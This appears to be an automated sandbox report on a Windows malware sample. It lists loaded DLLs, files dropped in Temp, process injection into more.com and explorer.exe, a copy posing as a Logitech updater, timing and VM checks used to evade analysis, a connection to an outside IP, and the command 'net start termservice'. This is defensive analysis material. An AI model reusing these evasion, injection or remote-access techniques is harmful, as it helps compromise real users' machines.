Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: wer.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: fontsub.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: comsvcs.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: cmlua.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: cmutil.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: fontsub.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\more.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\SysWOW64\more.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\more.com Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe File opened: C:\Windows\SysWOW64\msftedit.dll Jump to behavior
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static file information: File size 11391336 > 1048576
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5d0a00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x470e00
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: More than 200 imports for user32.dll
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source: Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source: Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe Static PE information: section name: .didata
Source: cnfpnteryde.1.dr Static PE information: section name: dld
Source: vkqcbyjdfiw.12.dr Static PE information: section name: dld
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00789FB1 push ecx; ret 14_2_00789FC4
Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw
Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde
Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Local\Temp\cnfpnteryde
Source: C:\Windows\SysWOW64\more.com File created: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\more.com Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CNFPNTERYDE
Source: C:\Windows\SysWOW64\more.com Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VKQCBYJDFIW
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe API/Special instruction interceptor: Address: 75DA7C44
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe API/Special instruction interceptor: Address: 75DA7945
Source: C:\Windows\SysWOW64\more.com API/Special instruction interceptor: Address: 75DA3B54
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe API/Special instruction interceptor: Address: 75DA7C44
Source: C:\Windows\SysWOW64\explorer.exe API/Special instruction interceptor: Address: B0A317
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe API/Special instruction interceptor: Address: 75DA7945
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe RDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe RDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe RDTSC instruction interceptor: First address: 75DAF3E1 second address: 75DAF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe RDTSC instruction interceptor: First address: 75DAF3FD second address: 75DAF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F8C64C6CA05h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F8C64C6CA90h 0x00000031 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007D8A00 rdtsc 14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\more.com Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw
Source: C:\Windows\SysWOW64\more.com Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cnfpnteryde
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe TID: 7312 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe TID: 8124 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6108 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 764 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2504 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0079ED13 FindFirstFileExW, 14_2_0079ED13
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007693D0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetVersionExW, 14_2_007693D0
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 180000
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware, Inc.0
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007D8A00 rdtsc 14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_0078A195
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Code function: 0_2_0079A032 mov eax, dword ptr fs:[00000030h] 0_2_0079A032
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007D8A00 mov eax, dword ptr fs:[00000030h] 14_2_007D8A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078DB50 mov eax, dword ptr fs:[00000030h] 14_2_0078DB50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00795D42 mov eax, dword ptr fs:[00000030h] 14_2_00795D42
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078A195 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_0078A195
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078E87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_0078E87C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007898A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_007898A8

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 188.114.97.3 80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00767EB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 14_2_00767EB0
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtProtectVirtualMemory: Direct from: 0x6E5D2C38
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe NtProtectVirtualMemory: Direct from: 0x6E5B2D04
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtSetInformationThread: Direct from: 0x79ACD3
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtQuerySystemInformation: Direct from: 0x517AFF
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtProtectVirtualMemory: Direct from: 0x6C86214E
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtSetTimerEx: Direct from: 0x76EF7B2E
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtQueryInformationToken: Direct from: 0x6C6980B4
Source: C:\Windows\SysWOW64\more.com Memory written: PID: 4348 base: B079C0 value: 55
Source: C:\Windows\SysWOW64\more.com Memory written: PID: 4348 base: 9F0008 value: 00
Source: C:\Windows\SysWOW64\more.com Memory written: PID: 3492 base: B079C0 value: 55
Source: C:\Windows\SysWOW64\more.com Memory written: PID: 3492 base: 3129008 value: 00
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
Source: C:\Windows\SysWOW64\more.com Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0
Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F0008
Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0
Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: 3129008
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078A37F cpuid 14_2_0078A37F
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW, 14_2_007A222E
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_007A2354
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW, 14_2_007A245A
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW, 14_2_0079842E
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_007A2529
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 14_2_007A1BC8
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW, 14_2_007A1DC3
Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW, 14_2_007A1E6A
Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW, 14_2_007A1EB5
Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW, 14_2_007A1F50
Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW, 14_2_00797F0C
Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_007A1FDB
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9c813d63 VolumeInformation
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bca94d0c VolumeInformation
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Queries volume information: C:\Users\user\AppData\Local\Temp\be3cb5d2 VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize, 14_2_0076E8D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0077F060 Sleep,RegOpenKeyExA,RegCloseKey,GetUserNameA,GetModuleFileNameA, 14_2_0077F060
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0079E430 _free,_free,_free,GetTimeZoneInformation,_free, 14_2_0079E430
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007691B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo, 14_2_007691B0
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality

Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
